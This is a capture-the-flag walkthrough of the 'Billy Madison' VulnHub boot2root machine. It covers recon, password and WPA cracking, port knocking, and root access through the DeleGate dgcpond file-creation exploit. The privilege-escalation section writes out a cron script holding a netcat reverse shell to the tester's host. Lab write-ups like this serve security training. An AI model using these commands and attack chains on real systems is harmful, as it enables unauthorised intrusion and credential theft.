I was browsing Twitter one afternoon and saw that @7minsec was looking for testers for his next boot2root challenge, based on the movie Billy Madison. Since I thoroughly enjoyed his first CTF (Tommy Boy) I jumped at the opportunity.

Recon

As always, we start off with a super stealthy nmap scan.

Nmap scan report for 192.168.110.181
Host is up (0.00020s latency).
Not shown: 65526 filtered ports

PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
80/tcp   open   http        Apache httpd 2.4.18 
139/tcp  open   netbios-ssn Samba smbd 3.X 
445/tcp  open   netbios-ssn Samba smbd 3.X 
2525/tcp open   smtp

Grabbing the source of the index page on port 80 we can see that Billy’s PC has been take over and we must unlock it and recover his final paper before time is up! I also took a look at the eric.php page, which came to find out later is a troll to block directory bruteforcing with tools such as dirbuster.

root@mrb3n:~# curl -s http://192.168.110.181
<TITLE>Oh nooooooo!</TITLE>
<html>
<p>
<center><h1> UH OH!</h1></center>
<p>
<center><img src="eric-tongue-animated.gif"></center>
<p>
<center><h1>Silly Billy!!!</h1></center>
<p>
<center><h3>If you're reading this, you clicked on the link I sent you.  OH NOES!  Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on!  You need that to graduate, Billy Boy!!</h3></center>
<p>
<center><h3>Now all I have to do is sit and wait for a while and...</h3></center>
<p>
<center><img src="hotels.gif"></center>
<p> 
<center><h2>I bet this is you right now:</h2></center>
<p>
<center><img src="billy-mad.png"><img src="billy-mad.png"><img src="billy-mad.png"></center>
<P>
<p><center><h2>Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL?????</h2></center>
<p>
<center>Good luck, schmuck.</center>
<p>
</html>

I pulled down all of the images for offline analysis as they often contain valuable information during CTFs but I did not uncover anything useful.

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/billy-mad.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  225k  100  225k    0     0  18.5M      0 --:--:-- --:--:-- --:--:-- 19.9M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/hotels.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  329k  100  329k    0     0  53.6M      0 --:--:-- --:--:-- --:--:-- 64.4M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/eric-tongue-animated.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  440k  100  440k    0     0  26.1M      0 --:--:-- --:--:-- --:--:-- 26.8M

Having exhausted my options on the web app for the time being I checked out what was going on with the telnet port. I was greeted with a friendly ban notice (confirmed on a re-connection attempt) as well as my first hint at a password (possibly ROT).

root@mrb3n:~/Desktop/billymadison# telnet 192.168.110.181
Trying 192.168.110.181...
Connected to 192.168.110.181.
Escape character is '^]'.
****** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
Connection closed by foreign host.

Port 69 was hosting a WordPress site. I enumerated a bit with WPScan and ultimately hit a wall. Once on the box I confirmed that this was an intentional honeypot by the author.

root@mrb3n:~# wpscan --url http://192.168.110.181:69 --enumerate u
WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
y
[+] URL: http://192.168.110.181:69/
[+] Started: Thu Aug 25 11:33:21 2016

[!] The WordPress 'http://192.168.110.181:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://192.168.110.181:69/xmlrpc.php

[+] WordPress version 1.0 identified from meta generator

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Location: http://192.168.110.181:69/wp-content/themes/twentyeleven/
 |  Readme: http://192.168.110.181:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://192.168.110.181:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://192.168.110.181:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://192.168.110.181:69/static/wp-content/themes/twentyeleven/style.css
 |  Description: 

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[!] Stop User Enumeration plugin detected, results might be empty. However a bypass exists for v1.2.8 and below, see stop_user_enumeration_bypass.rb in /usr/share/wpscan
[+] We did not enumerate any usernames

[+] Finished: Thu Aug 25 11:33:22 2016
[+] Requests Done: 62
[+] Memory used: 7.863 MB
[+] Elapsed time: 00:00:00

Next I fired up enum4linux to see what I could uncover on our SMB port. The scan returned an open share (with anonymous access) as well as 3 local users.

root@mrb3n:~/Desktop/billymadison# enum4linux -a 192.168.110.181
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 25 11:23:27 2016

 ============================================ 
|    Share Enumeration on 192.168.110.181    |
 ============================================ 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	EricsSecretStuff Disk      
	IPC$            IPC       IPC Service (BM)

	Server               Comment
	---------            -------
	BM                   BM

	Workgroup            Master
	---------            -------
	WORKGROUP            BM

[+] Attempting to map shares on 192.168.110.181
//192.168.110.181/EricsSecretStuff	Mapping: OK, Listing: OK
//192.168.110.181/IPC$	Mapping: OK	Listing: DENIED


========================================================================== 
|    Users on 192.168.110.181 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-4111762292-2429122530-3796655328
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ' '

S-1-22-1-1000 Unix User\billy (Local User)
S-1-22-1-1001 Unix User\veronica (Local User)
S-1-22-1-1002 Unix User\eric (Local User)

Connecting to the Samba share I pulled down the files listed. The ebd.txt file stated that the backdoor was closed, more on that later.

root@mrb3n:~# smbclient //192.168.110.181/EricsSecretStuff -u anonymous
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Thu Aug 25 10:16:19 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Thu Aug 25 10:16:19 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

59164 blocks of size 524288. 50914 blocks available

smb: \> get ebd.txt 
getting file \ebd.txt of size 35 as ebd.txt (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get ._.DS_Store 
getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 403.4 KiloBytes/sec)
smb: \> get .DS_Store 
getting file \.DS_Store of size 6148 as .DS_Store (1200.8 KiloBytes/sec) (average 669.2 KiloBytes/sec)

root@mrb3n:~/Desktop/billymadison# cat ebd.txt 

Erics backdoor is currently CLOSED

The string ‘Rkfpuzrahngvat’ obtained from the telnet connection earlier was interesting and appeared to be some sort of encrypted or ciphered text. In the end it proved to be ROT13, decrypting to ‘exschmenuating’. I tried this in various combinations of username and password without success. Eventually I took a long shot and attempted it as a page name and got a hit! Eric’s admin console!

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/

<TITLE>Eric's Admin Console 1.0</TITLE>
<html>
<h1>"Ruin Billy Madison's Life" - Eric's notes</h1>
<p>
<center><h1>08/01/16</h1></center>
Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life.  Will ponder other victims.

<center><h1>08/02/16</h1></center>
Ah!  Genius thought!  Billy's girlfriend Veronica uses his machine too.  I might have to cook up a phish and see if I can't get her to take the bait.

<center><h2>08/03/16</h2></center>
OMg LOL LOL LOL!!!  What a twit - I can't believe she fell for it!!  I .captured the whole thing in this folder for later lulz.  I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks!

Anyway, malware installation successful.  I'm now in complete control of Bill's machine!

<center>
<center><h1>Log monitor</h1></center>
<p>
<center>This will help me keep an eye on Billy's attempt to free his machine from my wrath.</center>
<p>
<center><a href="currently-banned-hosts.txt">View log</a>
<p>
</html>

Checking out the ‘currently-banned-hosts.txt’ file confirms that I have been banned multiple times while trying to connect via telnet. The file also offers a hint to reset the VM to remove the ban.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-13-59-01
Hosts currently banned
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---
Chain INPUT (policy DROP)
DROP       all  --  192.168.110.179      anywhere            
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.

I reset the VM and checked the ban list again.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-14-08-01
Hosts currently banned
Chain INPUT (policy DROP)
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---

From the clue on the page above it seems like I may be looking for a packet capture file with ‘veronica’ in the file name. I tried many combinations, ultimately finding the file with a combination of a custom wordlist based on rockyou.txt and wfuzz.

root@mrb3n:~/Desktop/billymadison# cat /root/rockyou.txt | grep veronica > veronica.txt

root@mrb3n:~/Desktop/billymadison# wfuzz  -c -z file,/root/Desktop/billymadison/veronica.txt --hc 404 http://192.168.110.181/exschmenuating/FUZZ.cap 
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.110.181/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00521:  C=400     10 L	      35 W	    307 Ch	  "veronica$%"
00716:  C=200    192 L	     722 W	   8700 Ch	  "012987veronica"
00723:  C=200     24 L	     135 W	    940 Ch	  "#0104veronica"

Total time: 0.705309
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 1095.972

We are able to analyze packet capture files using the tshark command line utility. A quick bash script will pull out all separate TCP steams into .txt files.

for stream in `tshark -r 012987veronica.cap -T fields -e tcp.stream | sort -n | uniq`
do
    echo $stream
    tshark -r 012987veronica.cap -w stream-$stream.cap -Y "tcp.stream==$stream"
done

The packet capture contained 6 separate email messages.

Message 1

Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just <a href="http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php">click here</a> to install it, k?  

Thanks. -Eric

Message 2

Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.



-VV

Message 3

Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

Message 4

Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric

Message 5

Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

Message 6

Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V

There is a lot of information here but the most important being in messages 2 and 3. The “Spanish Armada” combo is message 2 alludes to port knocking. In the YouTube clip provided Billy guesses the year of Spanish Armada is the following sequence: 1466, 1467, 1469, 1514, 1981, 1986. However, listening carefully he actually says “67” not 1467. We can use nmap for some port knocking with the combo provided.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.110.181; done

Once completed I checked and sure enough port 21 was now open. Logging in with the credentials provided in message 3 provided our next clue.

The FTP directory contained a notes file as well as various exploits from exploit.db for Ubuntu 16.04 which were likely trolls, but I saved them for later just in case.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp 740 Aug 22 21:18 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773

The .notes file refers to the privilege escalation explanations, one of them being backwards (more on that later) as well as a hint at how to open Eric’s backdoor and a mention of Billy and Veronica’s account passwords.

root@mrb3n:~/Desktop/billymadison# cat .notes 
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

From some earlier testing I knew that I could send emails over port 2525 via telnet and the email file would be accessible in the EricsSecretStuff Samba directory. I crafted an email with the phrase “My kid will be a soccer player” in the body, waited a bit and checked. Sure enough the ebd file now stated that the backdoor was open.

root@mrb3n:~/Desktop/billymadison# telnet 192.168.72.155 2525
Trying 192.168.72.155...
Connected to 192.168.72.155.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
MAIL FROM: vvaugh@polyfector.edu
250 Ok
RCPT TO: eric@madisonhotels.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player

.
250 Ok

Email received

root@mrb3n:~# smbclient //192.168.72.155/EricsSecretStuff
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Fri Aug 26 10:57:38 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  260816095738178.eml                 N       95  Fri Aug 26 10:57:38 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       53  Fri Aug 26 11:00:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

		59164 blocks of size 524288. 50881 blocks available
smb: \> get 260816095738178.eml 
getting file \260816095738178.eml of size 95 as 260816095738178.eml (30.9 KiloBytes/sec) (average 30.9 KiloBytes/sec)
smb: \> ^Z
[1]+  Stopped                 smbclient //192.168.72.155/EricsSecretStuff
root@mrb3n:~# cat 260816095738178.eml 
        Fri, 26 Aug 2016 09:57:14 -0500 (CDT)

SUBJECT: email

My kid will be a soccer player

Backdoor now open.

root@mrb3n:~# cat ebd.txt 
2016-08-26-10-03-01
Erics backdoor is currently OPEN

Another nmap scan shows us a newly opened port 1974.

PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   open   telnet
69/tcp   open   tftp
80/tcp   open   http
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds

Scanning port 1974 revealed that the backdoor was an SSH client.

root@mrb3n:~# nmap -sV -p 1974 192.168.72.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-08-26 11:43 EDT
Nmap scan report for 192.168.72.155
Host is up (0.00062s latency).
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:44:13:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We now have an SSH client, a username (eric) but no password. Reading back through the hints we see that there must be a user account for billy or veronica on one of the previously opened services. Since we have a previously generated wordlist for Veronica I gave it a go with ncrack against the FTP service.

root@mrb3n:~/Desktop/billymadison# ncrack -u veronica -P veronica.txt -T 5 192.168.72.155 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2016-08-26 11:59 EDT

Discovered credentials for ftp on 192.168.72.155 21/tcp:
192.168.72.155 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 188.98 seconds.

Logging into the FTP as Veronica we have another email and another packet capture file. **Note you have to make sure to switch to binary mode once logged into the FTP or the packet capture file will not download properly.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap

The email talks about cracking Eric’s wireless password and sure enough the packet capture file is encrypted 802.11 wireless traffic.

root@mrb3n:~/Desktop/billymadison# cat email-from-billy.eml 
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

Armed with our packet capture file and the trusty rockyou.txt wordlist I set to work attempting to crack Eric’s wireless password using aircrack-ng. Some 30 minutes later and I had a hit.

root@mrb3n:~/Desktop/billymadison# aircrack-ng eg-01.cap -w /root/rockyou.txt 
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc3


                   [00:32:35] 1699628 keys tested (897.71 k/s))


                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D 
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC 

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

Finally, after all this time I had a shell. Logging in with eric’s credentials I was on to the next step.

root@mrb3n:~/Desktop/billymadison# ssh eric@192.168.72.155 -p 1974
eric@192.168.72.155's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

12 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ 


eric@BM:~$ cat why-1974.txt 
Why 1974?  Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/

Beware of trolls!

The author took care to plant many trolls throughout the file system as well as some programs and files to give the appearance of an actual workstation.

eric@BM:/opt/coloradoftp-prime/home/anonymous$ cat Billys-12th-grade-final-project.doc 
HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!!  WHAT A LOSER! Why don't you go pass
out by the pool for another hour!

-EG

I guess billy works as a pentester?

eric@BM:/opt# ls
bpatty             fakesmtp    reconng  Sn1per   wp
coloradoftp-prime  honeyports  rg       testssl

Privilege escalation

I spent a great deal of time enumerating the file system. I could see that billy had sudo privileges and a directory named ‘/PRIVATE’, owned by root. At this point I knew that I had to become root to move forward. None of the privilege escalation exploits alluded to in the FTP directory worked nor was I was to guess billy’s password.

I performed all the normal checks for world-writeable files, SUID and GUID binaries and one stood out.

root@BM:/opt/bpatty# find / -perm -2000 -type f 2>/dev/null
/usr/local/share/sgml/donpcgd
/usr/bin/chage
/usr/bin/wall
/usr/bin/screen
/usr/bin/mlocate
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/at
/usr/bin/ssh-agent
/usr/lib/x86_64-linux-gnu/utempter/utempter
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd

The binary in /usr/local/share/sgml appeared out of place. I pulled it down, opened it in IDA and confirmed that it was not a custom binary made for this challenge. Backing up to the hint about some of the exploits being backwards. If we reverse the name of this binary to “dgcpond” we have a likely candidate for local privilege escalation in DeleGate v9.9.13 (https://www.exploit-db.com/exploits/39134) which sets some binaries as SUID root (in this case GUID).  Per the explanation the “dgcpond” binary creates a node allowing for a local, unprivileged user, to create files anywhere on the disk. Meaning we can create a file in ANY directory (even those owned by root). Creating a shell script in the /etc/cron.hourly directory should help us to escalate privileges as any executable shell scripts in that directory will be run as root at 17 minutes past every hour.

Modifying the exploit syntax a bit a created an hourly cron to send me a reverse shell using mknod.

eric@BM:/usr/local/share/sgml$ touch /tmp/rootme; chmod +x /tmp/rootme; ./donpcgd /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe' > /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/root,81fd,0)

I confirmed that the hourly cron job had been created, set up my listener and waited.

eric@BM:/etc/cron.hourly$ cat rootme
#!/bin/bash 
 mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

I checked back after 17 past the next hour and I had a hit on my listener. A root shell!

root@mrb3n:~# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.72.154] from (UNKNOWN) [192.168.72.155] 58066
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux BM 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
python -c 'import pty;pty.spawn("/bin/bash")'

root@BM:/#

Establishing persistence

Even after obtaining a better working tty the shell was a big sluggish. I decided to be a bit dirty and change billy’s password since I knew that he had sudo privileges. After changing his password I logged back in via SSH and things were much more stable.

root@BM:/# passwd billy
pswd billy
Enter new UNIX password: billy
Retype new UNIX password: billy

Checking out the root directory I found all of the shell scripts the author had carefully set up to troll us/keep us on track. Nicely done!

root@BM:~# ls
checkban    ebd.sh   email.sh  fwconfig.sh  ssh.sh      telnet.sh
cleanup.sh  ebd.txt  ftp.sh    ssh          startup.sh  wp.sh

PRIVATE

Moving over to the /PRIVATE directory I found a hint file as well as an unknown file which later proved to be a Truecrypt volume based on the hint “truely cracks me up”.

root@BM:/PRIVATE# ls -lah
total 1.1M
drwx------  2 root  root  4.0K Aug 21 16:45 .
drwxr-xr-x 25 root  root  4.0K Aug 20 13:59 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   191 Aug 21 16:45 hint.txt


root@BM:/PRIVATE# cat hint.txt 
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

I pulled the truecrypt volume down locally and created  a wordlist using cewl and the Wikipedia link provided.

root@mrb3n:~/Desktop/billymadison# cewl -v en.wikipedia.org/wiki/Billy_Madison -d 1 -w billy_madison.txt

When using cewl and Wikipedia to create wordlists we are left with lots of junk. The following command can be used to clean things up a bit.

root@mrb3n:~/Desktop/billymadison# cat billy_madison.txt | grep "\w\{7,\}" | grep -v "^wg" | head -n -50 > short_billy_madison.txt

Next I fired up truecrack against the truecrypt volume using the shiny new wordlist. 236 attempts in and we had a hit.

root@mrb3n:~/Desktop/billymadison# truecrack -t BowelMovement -w /root/rockyou.txt -v

231	inspired	NO
232	ignores		NO
233	initially	NO
234	calling		NO
235	execrable	YES
Found password:		"execrable"
Password length:	"10"
Total computations:	"236"

Now I had a password but I still had to mount the Truecrypt volume to see what the author had in store for us next. Kali Linux comes with cryptsetup which can be used to access a truecrypt container if we don’t have truecrypt installed. The following command will open the truecrypt container (after we enter the password).

root@mrb3n:~/Desktop/billymadison# cryptsetup open --type tcrypt /root/Desktop/billymadison/BowelMovement billy
Enter passphrase: 

Once open, we can mount the truecrypt container at a mountpoint of our choosing.

root@mrb3n:~/Desktop/billymadison# mount -t vfat /dev/mapper/billy /root/Desktop/billymadison/BowelMovement 

Browsing to the mountpoint I was presented with another zip file as well as a .doc file containing Billy’s final project. My heart sank for a moment, wondering what additional final password cracking challenge the author had in store. Lucky for us he was gracious enough to give up the final flag without a fight.

root@mrb3n:/media/root/4ED7-715F# unzip secret.zip 
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc  
  inflating: THE-END.txt

The End

root@mrb3n:/media/root/4ED7-715F# cat THE-END.txt 
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Billy Madison 12th Grade Final Project

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." 
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em. 
Except that the puppy was a dog. 
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!



-BM

Final thoughts

This boot2root was a ton of fun and brought my back to my childhood watching classic Adam Sandler movies. The author definitely upped the challenge from his previous Tommy Boy VM and presented us with a highly polished, well thought out scenario which required iterative/out-of-the-box thinking as well as chaining together a variety of tactics and tools.

Thanks to and props to @7minsec for putting together another great challenge and, as always, thank you to @g0tmi1k for keeping the #vulnhub community up and running.